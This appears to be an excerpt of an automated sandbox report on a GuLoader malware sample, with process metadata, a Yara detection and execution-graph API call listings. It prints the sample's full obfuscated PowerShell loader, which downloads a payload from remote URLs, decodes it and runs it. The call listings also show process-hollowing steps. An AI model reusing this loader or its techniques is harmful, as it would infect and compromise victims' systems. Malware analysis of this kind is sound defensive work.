                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). 
');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0x70000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.3375923464.000000000AC25000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:07:31:34
                                                        Start date:27/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x790000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:3.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:14
                                                          Total number of Limit Nodes:0

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: [6q;
                                                          • API String ID: 963392458-2592173838

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173029576.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2173744555.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7ff848fd0000_powershell.jbxd

                                                          Execution Graph

                                                          Execution Coverage:5.1%
                                                          Dynamic/Decrypted Code Coverage:3.6%
                                                          Signature Coverage:9.9%
                                                          Total number of Nodes:1956
                                                          Total number of Limit Nodes:68
53287->53288 53295 404c30 53288->53295 53292 404ca1 53471 404e26 99 API calls 53292->53471 53295->53292 53297 401fd8 11 API calls 53295->53297 53429 43bd51 53295->53429 53436 404b96 53295->53436 53442 4020b7 53295->53442 53448 401fe2 53295->53448 53457 404cc3 53295->53457 53296 404ca8 53298 401fd8 11 API calls 53296->53298 53297->53295 53299 404cb1 53298->53299 53300 401fd8 11 API calls 53299->53300 53301 404cba 53300->53301 53301->53111 53304 4020df 11 API calls 53303->53304 53305 40532a 53304->53305 53345 4032a0 53305->53345 53307 405346 53307->53212 53309 40209b 53308->53309 53310 4023ce 11 API calls 53309->53310 53311 4020a6 53310->53311 53349 4024ed 53311->53349 53314 41b4ef 53315 41b5a0 53314->53315 53316 41b505 GetLocalTime 53314->53316 53318 401fd8 11 API calls 53315->53318 53317 40531e 28 API calls 53316->53317 53319 41b547 53317->53319 53320 41b5a8 53318->53320 53360 406383 53319->53360 53322 401fd8 11 API calls 53320->53322 53324 41b5b0 53322->53324 53324->53204 53325 402f10 28 API calls 53326 41b55f 53325->53326 53327 406383 28 API calls 53326->53327 53328 41b56b 53327->53328 53365 407200 77 API calls 53328->53365 53330 41b579 53331 401fd8 11 API calls 53330->53331 53332 41b585 53331->53332 53333 401fd8 11 API calls 53332->53333 53334 41b58e 53333->53334 53335 401fd8 11 API calls 53334->53335 53336 41b597 53335->53336 53337 401fd8 11 API calls 53336->53337 53337->53315 53338->53211 53339->53253 53340->53232 53341->53244 53342->53245 53343->53213 53346 4032aa 53345->53346 53347 4028e8 28 API calls 53346->53347 53348 4032c9 53346->53348 53347->53348 53348->53307 53350 4024f9 53349->53350 53353 40250a 53350->53353 53352 4020b1 53352->53314 53354 40251a 53353->53354 53355 402520 53354->53355 53356 402535 53354->53356 53358 402569 28 API calls 53355->53358 53357 4028e8 28 API calls 53356->53357 53359 402533 53357->53359 53358->53359 53359->53352 53366 4051ef 53360->53366 53362 406391 53370 402055 53362->53370 53365->53330 53367 4051fb 53366->53367 53376 
405274 53367->53376 53369 405208 53369->53362 53371 402061 53370->53371 53372 4023ce 11 API calls 53371->53372 53373 40207b 53372->53373 53398 40267a 53373->53398 53377 405282 53376->53377 53378 40529e 53377->53378 53379 405288 53377->53379 53380 4052f5 53378->53380 53381 4052b6 53378->53381 53387 4025f0 53379->53387 53396 4028a4 22 API calls 53380->53396 53385 4028e8 28 API calls 53381->53385 53386 40529c 53381->53386 53385->53386 53386->53369 53388 402888 22 API calls 53387->53388 53389 402602 53388->53389 53390 402672 53389->53390 53391 402629 53389->53391 53397 4028a4 22 API calls 53390->53397 53394 4028e8 28 API calls 53391->53394 53395 40263b 53391->53395 53394->53395 53395->53386 53399 40268b 53398->53399 53400 4023ce 11 API calls 53399->53400 53401 40208d 53400->53401 53401->53325 53403 4025f0 28 API calls 53402->53403 53404 401fbd 53403->53404 53404->53267 53406 405214 53405->53406 53407 4023ce 11 API calls 53406->53407 53408 40521f 53407->53408 53412 405234 53408->53412 53410 40522e 53410->53273 53411->53280 53413 405240 53412->53413 53414 40526e 53412->53414 53416 4028e8 28 API calls 53413->53416 53428 4028a4 22 API calls 53414->53428 53418 40524a 53416->53418 53418->53410 53434 446137 ___crtLCMapStringA 53429->53434 53430 446175 53473 4405dd 20 API calls __dosmaperr 53430->53473 53431 446160 RtlAllocateHeap 53433 446173 53431->53433 53431->53434 53433->53295 53434->53430 53434->53431 53472 442f80 7 API calls 2 library calls 53434->53472 53437 404ba0 WaitForSingleObject 53436->53437 53438 404bcd recv 53436->53438 53474 421076 54 API calls 53437->53474 53440 404be0 53438->53440 53440->53295 53441 404bbc SetEvent 53441->53440 53443 4020bf 53442->53443 53444 4023ce 11 API calls 53443->53444 53445 4020ca 53444->53445 53446 40250a 28 API calls 53445->53446 53447 4020d9 53446->53447 53447->53295 53449 401ff1 53448->53449 53456 402039 53448->53456 53450 4023ce 11 API calls 53449->53450 53451 401ffa 53450->53451 53452 40203c 53451->53452 53454 402015 
53451->53454 53453 40267a 11 API calls 53452->53453 53453->53456 53475 403098 28 API calls 53454->53475 53456->53295 53458 4020df 11 API calls 53457->53458 53468 404cde 53458->53468 53459 404e13 53460 401fd8 11 API calls 53459->53460 53461 404e1c 53460->53461 53461->53295 53462 4041a2 28 API calls 53462->53468 53463 401fe2 28 API calls 53463->53468 53464 401fd8 11 API calls 53464->53468 53465 4020f6 28 API calls 53465->53468 53468->53459 53468->53462 53468->53463 53468->53464 53468->53465 53476 406eb0 53468->53476 53547 41299f 53468->53547 53591 401fc0 53468->53591 53471->53296 53472->53434 53473->53433 53474->53441 53475->53456 53477 406ec4 53476->53477 53595 4041a2 53477->53595 53480 4020f6 28 API calls 53481 406ee8 53480->53481 53482 4020f6 28 API calls 53481->53482 53483 406ef7 53482->53483 53598 41be1b 53483->53598 53486 406f0b 53491 401e65 22 API calls 53486->53491 53545 4070e6 53486->53545 53487 40702e 53488 401e65 22 API calls 53487->53488 53490 40703a 53488->53490 53489 401e8d 11 API calls 53493 407176 53489->53493 53495 407052 53490->53495 53496 4070eb 53490->53496 53492 406f20 53491->53492 53499 406f38 53492->53499 53500 406fda 53492->53500 53494 401fd8 11 API calls 53493->53494 53497 40717f 53494->53497 53498 401e65 22 API calls 53495->53498 53502 401e65 22 API calls 53496->53502 53501 401fd8 11 API calls 53497->53501 53503 407059 53498->53503 53504 401e65 22 API calls 53499->53504 53506 401e65 22 API calls 53500->53506 53505 407187 53501->53505 53508 4070f1 53502->53508 53509 401e65 22 API calls 53503->53509 53507 406f3f 53504->53507 53505->53468 53511 406fe0 53506->53511 53513 401e65 22 API calls 53507->53513 53510 401e65 22 API calls 53508->53510 53508->53545 53512 40706d 53509->53512 53514 407114 53510->53514 53515 401e65 22 API calls 53511->53515 53511->53545 53518 40da34 32 API calls 53512->53518 53516 406f53 53513->53516 53685 41b9f6 22 API calls 2 library calls 53514->53685 53517 406ffe 53515->53517 53620 40da34 53516->53620 53679 418568 
53517->53679 53525 407080 53518->53525 53522 406f66 53528 401e65 22 API calls 53522->53528 53523 407126 53524 407011 53523->53524 53526 418568 31 API calls 53523->53526 53530 402093 28 API calls 53524->53530 53527 401e65 22 API calls 53525->53527 53526->53524 53529 407097 53527->53529 53532 406f7c 53528->53532 53533 40709e URLDownloadToFileW 53529->53533 53531 407160 53530->53531 53534 404aa1 61 API calls 53531->53534 53678 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 53532->53678 53536 406f85 53533->53536 53537 406fd0 53533->53537 53534->53545 53536->53537 53538 401e65 22 API calls 53536->53538 53539 402093 28 API calls 53537->53539 53543 406f98 53538->53543 53540 4070d0 53539->53540 53541 404aa1 61 API calls 53540->53541 53542 4070dd 53541->53542 53682 401f09 53542->53682 53543->53537 53546 406fb5 ShellExecuteW 53543->53546 53545->53489 53546->53537 53548 4129b1 53547->53548 53549 4041a2 28 API calls 53548->53549 53550 4129c4 53549->53550 53551 4020f6 28 API calls 53550->53551 53552 4129d3 53551->53552 53553 4020f6 28 API calls 53552->53553 53554 4129e2 53553->53554 53555 41be1b 28 API calls 53554->53555 53557 4129eb 53555->53557 53556 412a93 53559 401e8d 11 API calls 53556->53559 53557->53556 53558 401e65 22 API calls 53557->53558 53561 412a02 53558->53561 53560 412a9c 53559->53560 53562 401fd8 11 API calls 53560->53562 53563 4020f6 28 API calls 53561->53563 53564 412aa5 53562->53564 53565 412a0d 53563->53565 53566 401fd8 11 API calls 53564->53566 53567 401e65 22 API calls 53565->53567 53568 412aad 53566->53568 53569 412a18 53567->53569 53568->53468 53570 4020f6 28 API calls 53569->53570 53571 412a23 53570->53571 53572 401e65 22 API calls 53571->53572 53573 412a2e 53572->53573 53574 4020f6 28 API calls 53573->53574 53575 412a39 53574->53575 53576 401e65 22 API calls 53575->53576 53577 412a44 53576->53577 53578 4020f6 28 API calls 53577->53578 53579 412a4f 53578->53579 53580 401e65 22 API calls 53579->53580 53581 412a5a 
53580->53581 53582 4020f6 28 API calls 53581->53582 53583 412a65 53582->53583 53584 401e65 22 API calls 53583->53584 53585 412a73 53584->53585 53586 4020f6 28 API calls 53585->53586 53587 412a7e 53586->53587 53847 412ab4 GetModuleFileNameW 53587->53847 53592 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 53591->53592 53593 401fc9 53591->53593 53592->53468 54153 415aea 53592->54153 54152 4025e0 28 API calls 53593->54152 53686 40423a 53595->53686 53599 4020df 11 API calls 53598->53599 53616 41be2e 53599->53616 53600 401fd8 11 API calls 53601 41bed0 53600->53601 53602 401fd8 11 API calls 53601->53602 53604 41bed8 53602->53604 53603 41bea0 53605 4041a2 28 API calls 53603->53605 53607 401fd8 11 API calls 53604->53607 53608 41beac 53605->53608 53606 4041a2 28 API calls 53606->53616 53610 406f00 53607->53610 53611 401fe2 28 API calls 53608->53611 53609 401fe2 28 API calls 53609->53616 53610->53486 53610->53487 53612 41beb5 53611->53612 53613 401fd8 11 API calls 53612->53613 53615 41bebd 53613->53615 53614 401fd8 11 API calls 53614->53616 53617 41ce34 28 API calls 53615->53617 53616->53603 53616->53606 53616->53609 53616->53614 53619 41be9e 53616->53619 53692 41ce34 53616->53692 53617->53619 53619->53600 53717 401f86 53620->53717 53623 40da70 53742 41b5b4 29 API calls 53623->53742 53624 40daa5 53752 41bfb7 53624->53752 53625 40da66 53627 40db99 GetLongPathNameW 53625->53627 53721 40417e 53627->53721 53629 40da79 53743 401f13 53629->53743 53634 40db00 53637 40417e 28 API calls 53634->53637 53635 40daae 53638 40417e 28 API calls 53635->53638 53636 40417e 28 API calls 53639 40dbbd 53636->53639 53640 40db0e 53637->53640 53641 40dabc 53638->53641 53727 40ddd1 53639->53727 53645 40417e 28 API calls 53640->53645 53646 40417e 28 API calls 53641->53646 53642 401f09 11 API calls 53642->53625 53649 40db24 53645->53649 53650 40dad2 53646->53650 53652 402fa5 28 API calls 53649->53652 53653 402fa5 28 API calls 53650->53653 53651 402fa5 28 API calls 
53654 40dbe5 53651->53654 53655 40db2f 53652->53655 53656 40dadd 53653->53656 53657 401f09 11 API calls 53654->53657 53658 401f13 28 API calls 53655->53658 53659 401f13 28 API calls 53656->53659 53660 40dbef 53657->53660 53661 40db3a 53658->53661 53662 40dae8 53659->53662 53663 401f09 11 API calls 53660->53663 53664 401f09 11 API calls 53661->53664 53665 401f09 11 API calls 53662->53665 53666 40dbf8 53663->53666 53667 40db43 53664->53667 53668 40daf1 53665->53668 53669 401f09 11 API calls 53666->53669 53670 401f09 11 API calls 53667->53670 53671 401f09 11 API calls 53668->53671 53672 40dc01 53669->53672 53673 40da83 53670->53673 53671->53673 53674 401f09 11 API calls 53672->53674 53673->53642 53675 40dc0a 53674->53675 53676 401f09 11 API calls 53675->53676 53677 40dc13 53676->53677 53677->53522 53678->53536 53827 4180ef 53679->53827 53683 402252 11 API calls 53682->53683 53684 401f12 53683->53684 53684->53545 53685->53523 53687 404243 53686->53687 53688 4023ce 11 API calls 53687->53688 53689 40424e 53688->53689 53690 402569 28 API calls 53689->53690 53691 4041b5 53690->53691 53691->53480 53693 41ce41 53692->53693 53694 41ce51 53693->53694 53695 41cea0 53693->53695 53699 41ce89 53694->53699 53703 41cfe0 28 API calls 53694->53703 53696 41ceba 53695->53696 53708 41cfe0 28 API calls 53695->53708 53698 41d146 28 API calls 53696->53698 53700 41ce9c 53698->53700 53704 41d146 53699->53704 53700->53616 53703->53699 53705 41d14f 53704->53705 53709 41d1f2 53705->53709 53708->53696 53710 41d1fb 53709->53710 53713 41d2a0 53710->53713 53715 41d2ab 53713->53715 53714 41d159 53714->53700 53715->53714 53716 4020f6 28 API calls 53715->53716 53716->53714 53718 401f8e 53717->53718 53756 402252 53718->53756 53720 401f99 53720->53623 53720->53624 53720->53625 53722 404186 53721->53722 53723 402252 11 API calls 53722->53723 53724 404191 53723->53724 53761 4041bc 53724->53761 53728 40ddd9 53727->53728 53729 402252 11 API calls 53728->53729 53730 40dde4 53729->53730 53731 4041d9 28 API 
calls 53730->53731 53732 40dbd0 53731->53732 53733 402fa5 53732->53733 53737 402fb4 53733->53737 53734 402ff6 53809 40323f 53734->53809 53736 402ff4 53802 403262 53736->53802 53737->53734 53740 402feb 53737->53740 53808 403211 28 API calls 53740->53808 53742->53629 53744 401f22 53743->53744 53751 401f6a 53743->53751 53745 402252 11 API calls 53744->53745 53746 401f2b 53745->53746 53747 401f6d 53746->53747 53748 401f46 53746->53748 53749 402336 11 API calls 53747->53749 53826 40305c 28 API calls 53748->53826 53749->53751 53751->53673 53753 41bfc4 GetCurrentProcess IsWow64Process 53752->53753 53754 40daaa 53752->53754 53753->53754 53755 41bfdb 53753->53755 53754->53634 53754->53635 53755->53754 53757 4022ac 53756->53757 53758 40225c 53756->53758 53757->53720 53758->53757 53760 402779 11 API calls std::_Deallocate 53758->53760 53760->53757 53762 4041c8 53761->53762 53765 4041d9 53762->53765 53764 40419c 53764->53636 53766 4041e9 53765->53766 53767 404206 53766->53767 53768 4041ef 53766->53768 53782 4027e6 53767->53782 53772 404267 53768->53772 53771 404204 53771->53764 53773 402888 22 API calls 53772->53773 53774 40427b 53773->53774 53775 404290 53774->53775 53776 4042a5 53774->53776 53793 4042df 22 API calls 53775->53793 53778 4027e6 28 API calls 53776->53778 53781 4042a3 53778->53781 53779 404299 53794 402c48 22 API calls 53779->53794 53781->53771 53783 4027ef 53782->53783 53784 402851 53783->53784 53785 4027f9 53783->53785 53801 4028a4 22 API calls 53784->53801 53788 402802 53785->53788 53790 402815 53785->53790 53795 402aea 53788->53795 53791 402813 53790->53791 53792 402252 11 API calls 53790->53792 53791->53771 53792->53791 53793->53779 53794->53781 53796 402af4 __EH_prolog 53795->53796 53797 402e45 22 API calls 53796->53797 53799 402b60 53797->53799 53798 402252 11 API calls 53800 402bce 53798->53800 53799->53798 53800->53791 53803 40326e 53802->53803 53804 402252 11 API calls 53803->53804 53805 403288 53804->53805 53812 402336 53805->53812 53808->53736 53816 
4036a6 53809->53816 53811 40324c 53811->53736 53813 402347 53812->53813 53814 402252 11 API calls 53813->53814 53815 4023c7 53814->53815 53815->53651 53817 402888 22 API calls 53816->53817 53818 4036b9 53817->53818 53819 40372c 53818->53819 53820 4036de 53818->53820 53825 4028a4 22 API calls 53819->53825 53823 4027e6 28 API calls 53820->53823 53824 4036f0 53820->53824 53823->53824 53824->53811 53826->53751 53828 41811c 8 API calls 53827->53828 53829 418189 ___scrt_get_show_window_mode 53828->53829 53846 418328 CloseHandle CloseHandle 53828->53846 53830 4181ef CreateProcessW 53829->53830 53829->53846 53831 418225 VirtualAlloc Wow64GetThreadContext 53830->53831 53832 41847a GetLastError 53830->53832 53833 418253 ReadProcessMemory 53831->53833 53834 418444 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 53831->53834 53832->53846 53833->53834 53835 418279 NtCreateSection 53833->53835 53834->53846 53835->53834 53836 4182a1 53835->53836 53837 4182c1 NtMapViewOfSection 53836->53837 53838 4182b0 NtUnmapViewOfSection 53836->53838 53839 4182e5 VirtualFree NtClose TerminateProcess 53837->53839 53840 41832d GetCurrentProcess NtMapViewOfSection 53837->53840 53838->53837 53839->53828 53839->53846 53840->53834 53843 41835a ctype 53840->53843 53841 4183f6 WriteProcessMemory 53841->53834 53844 418415 53841->53844 53842 418419 Wow64SetThreadContext 53842->53834 53845 418432 ResumeThread 53842->53845 53843->53841 53843->53842 53844->53842 53845->53834 53845->53846 53846->53524 53848 4020df 11 API calls 53847->53848 53849 412adf 53848->53849 53850 4020df 11 API calls 53849->53850 53851 412aeb 53850->53851 53852 4020df 11 API calls 53851->53852 53874 412af7 53852->53874 53853 41b978 43 API calls 53853->53874 53854 40d9e8 32 API calls 53854->53874 53855 401fd8 11 API calls 53855->53874 53856 40417e 28 API calls 53856->53874 53857 4042fc 79 API calls 53857->53874 53858 40431d 28 API calls 53858->53874 53859 412c1d Sleep 53859->53874 53860 403014 28 API calls 
53860->53874 53861 418568 31 API calls 53861->53874 53862 412cbf Sleep 53862->53874 53863 401f09 11 API calls 53863->53874 53864 412d61 Sleep 53864->53874 53865 412dc4 DeleteFileW 53865->53874 53866 41c485 32 API calls 53866->53874 53867 412dfb DeleteFileW 53867->53874 53868 412e4d Sleep 53868->53874 53869 412e37 DeleteFileW 53869->53874 53870 412ec6 53871 401f09 11 API calls 53870->53871 53872 412ed2 53871->53872 53873 401f09 11 API calls 53872->53873 53875 412ede 53873->53875 53874->53853 53874->53854 53874->53855 53874->53856 53874->53857 53874->53858 53874->53859 53874->53860 53874->53861 53874->53862 53874->53863 53874->53864 53874->53865 53874->53866 53874->53867 53874->53868 53874->53869 53874->53870 53878 412e92 Sleep 53874->53878 53876 401f09 11 API calls 53875->53876 53877 412eea 53876->53877 53995 40b904 53877->53995 53880 401f09 11 API calls 53878->53880 53885 412ea2 53880->53885 53881 412efd 53882 4020f6 28 API calls 53881->53882 53884 412f1d 53882->53884 53883 401f09 11 API calls 53883->53885 54001 41322d 53884->54001 53885->53874 53885->53883 53887 412ec4 53885->53887 53887->53877 53889 401f09 11 API calls 53890 412f34 53889->53890 53891 412f54 53890->53891 53892 4130a8 53890->53892 53894 41bd1e 28 API calls 53891->53894 54013 41bd1e 53892->54013 53896 412f60 53894->53896 54026 41bb8e 53896->54026 53897 402f31 28 API calls 53899 4130e8 53897->53899 53901 402f10 28 API calls 53899->53901 53900 412f7a 53902 402f31 28 API calls 53900->53902 53903 4130f7 53901->53903 53904 412faa 53902->53904 53906 402f10 28 API calls 53903->53906 53905 402f10 28 API calls 53904->53905 53908 412fb9 53905->53908 53907 413103 53906->53907 53909 402f10 28 API calls 53907->53909 53910 402f10 28 API calls 53908->53910 53911 413112 53909->53911 53912 412fc8 53910->53912 53913 402f10 28 API calls 53911->53913 53914 402f10 28 API calls 53912->53914 53915 413121 53913->53915 53916 412fd7 53914->53916 53917 402f10 28 API calls 53915->53917 53918 402f10 28 API calls 53916->53918 
